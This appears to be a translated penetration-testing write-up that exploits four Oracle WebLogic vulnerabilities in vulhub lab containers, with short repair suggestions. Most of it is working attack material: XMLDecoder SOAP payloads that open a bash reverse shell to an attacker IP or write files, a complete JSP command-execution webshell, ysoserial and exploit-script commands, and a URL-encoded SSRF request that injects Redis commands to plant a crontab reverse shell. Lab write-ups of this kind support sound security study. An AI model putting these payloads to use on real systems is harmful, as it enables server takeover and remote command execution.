Middleware vulnerability record --6
catalogue
1, Weblogic < 10.3.6'wls wsat'xmldecoder deserialization vulnerability (CVE-2017-10271)
3. Manual verification exploits
1> Access http://ip:7001/wls-wsat/CoordinatorPortType
2> Grab the package above and change it to POST parameter transfer
3> Using POST to pass parameters, construct XML rebound shell code
4> Listen in advance, getshell
2, Weblogic arbitrary file upload vulnerability (CVE-2018-2894)
2. Access http://ip:7001/console , will jump to the login page
3. Execute docker compose logs | grep password
6. Then click Security - > add, and upload webshell
7. Then F12, search tc_background, with a timestamp
8. Then access and execute successfully
3, Weblogic WLS Core Components deserialization Command Execution Vulnerability (CVE-2018-2628)
2. Visit /console and the setup is successful
3. Download ysoserial-cve-2018-2628 tool and start a JRMP Server
4. Use exploit Py script to target Weblogic( http://your-ip:7001 )Send packet
5. View, command execution succeeded
4, Weblogic SSRF vulnerability
3. Fill in any information and search for packet capturing
5. Inject HTTP header and use Redis to bounce shell
2> Send three redis commands and write the shell script to /etc/crontab
3> Listen in advance, getshell
1, Weblogic < 10.3.6'wls wsat'xmldecoder deserialization vulnerability (CVE-2017-10271)
1. Environment construction
docker + vulhub
cd vulhub/weblogic/CVE-2017-10271 docker-compose up -d
2. Access
The 404 indicates that the setup is successful
3. Manual verification exploits
1> Access http://ip:7001/wls-wsat/CoordinatorPortType
This vulnerability may exist if the following pages appear
Default vulnerable url
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
2> Grab the package above and change it to POST parameter transfer
3> Using POST to pass parameters, construct XML rebound shell code
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.129.129:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 640 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/192.168.129.225/1234 0>&1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
4> Listen in advance, getshell
5> Can also write to files
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.129.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println"><string>
<![CDATA[
<% out.print("test"); %>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
4. With tools
Direct detection, command execution and uploading
Repair suggestions
- Install the patch.
- Delete the WLS wsat component, and access again to return 404
2, Weblogic arbitrary file upload vulnerability (CVE-2018-2894)
1. Environment construction
docker + vulhub
cd vulhub/weblogic/CVE-2018-2894 docker-compose up -d
2. Access http://ip:7001/console , will jump to the login page
3. Execute docker compose logs | grep password
You can view the user name and password weblogic Hzxon4k3
4. Log in to the background page and click base_ Configure the domain, and open the enable Web service test page option in advanced
Then save
5. Modify working directory
visit http://your-ip:7001/ws_utc/config.do , set Work Home Dir to /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
Set directory to WS_ The static file css directory of the UTC application. No permission is required to access this directory
6. Then click Security - > add, and upload webshell
7. Then F12, search tc_background, with a timestamp
8. Then access and execute successfully
http://192.168.129.129:7001/ws_utc/css/config/keystore/1637242302425_shell.jsp http://ip:7001/ws_utc/css/config/keystore/ timestamp_ Uploaded file name
9. The Trojan horse is here
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p;
if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
}
else{
p = Runtime.getRuntime().exec(request.getParameter("cmd"));
}
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
3, Weblogic WLS Core Components deserialization Command Execution Vulnerability (CVE-2018-2628)
Ysoserial-cve-2018-2628, download link https://github.com/tdy218/ysoserial-cve-2018-2628/releases
expolit.py script, download link https://www.exploit-db.com/exploits/44553
1. Environment construction
docker + vulhub
cd vulhub/weblogic/CVE-2018-2628 docker-compose up -d
2. Visit /console and the setup is successful
3. Download ysoserial-cve-2018-2628 tool and start a JRMP Server
java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener 1234 Jdk7u21 "touch /tmp/hello"
java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener [Attacker listening port] jdk Version number "Command to execute"
4. Use exploit.py Script to target Weblogic( http://your-ip:7001 )Send packet
python2 exploit.py Target plane IP port(Default 7001) ysoserial-0.1-cve-2018-2628-all.jar Position attacker IP Attacker listening port JRMPClient
5. View, command execution succeeded
Go to the target directory of the deployment environment and execute docker compose exec Weblogic Bash
View the directory. The command is successfully executed and created
4, Weblogic SSRF vulnerability
1. Environment construction
docker + vulhub
cd vulhub/weblogic/ssrf docker-compose up -d
2. Visit /uddiexplorer/searchpublicregistries JSP. If it can be accessed normally, this vulnerability may exist
3. Fill in any information and search for packet capturing
And change it to get type
4. Probe Intranet
Parameter operator is a controllable parameter of SSRF. Change it to an open port, such as http://127.0.0.1:7001/ , error code will be returned
If the port is not open, it will return but could not connect over HTTP to server
The intranet status can be detected by returning the error information in the packet.
5. Inject HTTP header and use Redis to bounce shell
The SSRF of Weblogic has a big feature. Although it is a "GET" request, we can inject a newline character by passing in%0a%0d, and some services (such as redis) separate each command by a newline character. That is to say, we can attack the redis server in the intranet through this SSRF.
1> First, detect the redis server in the intranet through ssrf (the network segment of docker environment is generally 172.*)
docker ps -a docker inspect redis of id value
You can see the ip address at the bottom
Detect whether it is open
The sentence on the right shows that 6379 is open
2> Send three redis commands and write the shell script to /etc/crontab
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/ip/Port 0>&1'\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
url code it, add it after 6379, and contract
GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.27.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.129.226%2F1234%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=abcd&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1 Host: 192.168.129.129:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Origin: http://192.168.129.129:7001 Connection: close Referer: http://192.168.129.129:7001/uddiexplorer/SearchPublicRegistries.jsp Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=HB0dhXTP4WZ1VGP9qGRkvYq25f0TnhZQPQ2Fy4hqc1JYhz8dnqzd!1867720999 Upgrade-Insecure-Requests: 1
3> Listen in advance, getshell
Repair suggestions
Delete searchpublicregistries JSP file